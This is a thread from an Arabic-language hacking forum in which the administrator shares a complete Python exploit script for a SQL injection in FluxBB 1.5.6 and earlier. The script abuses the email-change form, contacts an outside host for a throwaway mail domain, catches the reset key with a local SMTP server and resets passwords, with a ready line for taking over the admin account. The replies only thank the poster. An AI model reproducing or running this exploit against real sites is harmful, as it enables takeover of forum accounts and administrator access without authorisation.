ثغرة FluxBB 1.5.6 SQL Injection Exploit

ثغرات المواقع والسيرفرات وكيفية استغلالها وشروحات مع تطبيقات عملية على استغلال الثغرات وتطبيقها


إضافة رد
قديم 11-29-2014
  #1
Cwne
Administrator
 الصورة الرمزية Cwne
 
تاريخ التسجيل: Mar 2004
الدولة: Palestine
المشاركات: 424
شكراً: 275
تم شكره 94 مرة في 83 مشاركة
افتراضي ثغرة FluxBB 1.5.6 SQL Injection Exploit



السلام عليكم ورحمة الله وبركاته
كيف حالكم يا شباب الصقور .
إن شاء الله تكونو مبسوطين

جبت لكم ثغرة نازلة بتاريخ اليوم

الثغرة SQL Injection Exploit
السكربت FluxBB
الاصدار 1.5.6

الاستغلال مكتوب بلغة البيرل

كود:
#!/usr/bin/env python
# Friday, November 21, 2014 - secthrowaway@safe-mail.net
# FluxBB <= 1.5.6 SQL Injection
# make sure that your IP is reachable
 
url = 'http://target.tld/forum/'
user = 'user' # dummy account
pwd = 'test'
 
import urllib, sys, smtpd, asyncore, re, sha
from email import message_from_string
from urllib2 import Request, urlopen
 
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17
Safari/537.36"
bindip = '0.0.0.0'
 
def stage1(sql):
if len(sql) > 80:
sys.exit('SQL too long, max 80 chars')
print "1st stage: %s (%d chars)" % (sql, len(sql))
r = urlopen(Request('%sprofile.php?action=change_email&id=%s' % (url, uid),
data="form_sent=1&req_new_email=%s&req_password=%s&new_email=Submit" % (urllib.quote(sql), pwd),
headers={"Referer": "%sprofile.php" % url, "User-agent": ua, "Cookie":
cookie})).read()
if 'An email has been sent to the specified address' not in r:
sys.exit('err')
 
def stage3(key):
print "3rd stage, using key: %s" % key
r = urlopen(Request('%sprofile.php?action=change_pass&id=%s&key=%s' % (url, uid, key),
headers={"User-agent": ua})).read()
if 'Your password has been updated' in r:
print 'success'
else:
print 'err'
 
class stage2_smtp(smtpd.SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data):
print '2nd stage: got mail', peer, mailfrom, "to:", rcpttos
key = re.search("(https?://.*&key=([^\s]+))", message_from_string(data).get_payload(decode=True),
re.MULTILINE)
if key is not None:
raise asyncore.ExitNow(key.group(2))
return
 
def login():
print "logging in"
r = urlopen(Request('%slogin.php?action=in' % url, data="form_sent=1&req_username=%s&req_password=%s"
% (user, pwd), headers={"User-agent": ua}))
try:
t = r.info()['set-cookie'].split(';')[0]
return (t.split('=')[1].split('%7C')[0], t)
except:
sys.exit('unable to login, check user/pass')
 
uid, cookie = login()
 
email_domain = urlopen(Request('http://tns.re/gen')).read()
print "using domain: %s" % email_domain
 
#this will change your password to your password :)
stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new(pwd).hexdigest(), uid, email_domain))
 
#this will change admin's (uid=2) password "123456"
#stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new("123456").hexdigest(), 2, email_domain))
 
try:
print "2nd stage: waiting for mail"
server = stage2_smtp((bindip, 25), None)
asyncore.loop()
except asyncore.ExitNow, key:
stage3(key)

وهيها مسجلة بموقع 1337day.com
http://1337day.com/exploit/22926
ملاحظة :- ليست من اكتشافي - لكن المرة الجاي انزل من إكتشافي إن شاء الله

والسلام عليكم ورحمة الله وبركاته
__________________
!! لآ تتعلم لتخترق ~ إخترق لتتعلم !!
Cwne غير متواجد حالياً  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ Cwne على المشاركة المفيدة:
قديم 11-29-2014
  #2
طائر العنقاء
فلسطين وطني
 الصورة الرمزية طائر العنقاء
 
تاريخ التسجيل: Apr 2008
الدولة: ||- أبحث عن وطني بين ركام الارض -||
العمر: 33
المشاركات: 3,648
شكراً: 437
تم شكره 623 مرة في 424 مشاركة
افتراضي رد: ثغرة FluxBB 1.5.6 SQL Injection Exploit

يسلموا ايديك يا وحش على الثغرة
ونحن بانتظار اكتشافاتك
__________________

أنا لا أكره الناس ... ولا أسطو على أحد




ولكني إذا ما جعت ... آكل لحم مغتصبي

حذاري من جوعي ومن غضبي

All Things Are Difficult Before They Are Easy

ραℓєѕтιηє ρнσєηιχ


طائر العنقاء غير متواجد حالياً  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ طائر العنقاء على المشاركة المفيدة:
Cwne (11-29-2014)
قديم 11-29-2014
  #3
Cwne
Administrator
 الصورة الرمزية Cwne
 
تاريخ التسجيل: Mar 2004
الدولة: Palestine
المشاركات: 424
شكراً: 275
تم شكره 94 مرة في 83 مشاركة
افتراضي رد: ثغرة FluxBB 1.5.6 SQL Injection Exploit

اقتباس:
المشاركة الأصلية كتبت بواسطة طائر العنقاء مشاهدة المشاركة
يسلموا ايديك يا وحش على الثغرة
ونحن بانتظار اكتشافاتك
اهلا وسهلا فيك يالغالي :d
إن شاء الله
__________________
!! لآ تتعلم لتخترق ~ إخترق لتتعلم !!
Cwne غير متواجد حالياً  
رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة Injection جديدة H@CK3R M!ND عالم الثغرات - Vulnerabilities World 10 01-22-2011 10:58 AM
Easy-Clanpage <= v2.01 SQL Injection Exploit HaCkEr SToOop عالم الثغرات - Vulnerabilities World 2 06-08-2010 05:19 PM
MojoClassifieds 2.0 Remote Blind SQL Injection Exploit lave84 عالم الثغرات - Vulnerabilities World 4 12-12-2008 08:17 PM
من يكتشف ثغرة SQL Injection Sniper4dz المبتدئين .. ابدأ بتعلم الهكر من هنا 2 08-14-2008 08:49 PM
ثغرة SQL-INJECTION في منتديات من نوع ib HACKERS PAL عالم الثغرات - Vulnerabilities World 4 09-08-2004 07:38 PM


الساعة الآن 09:53 PM.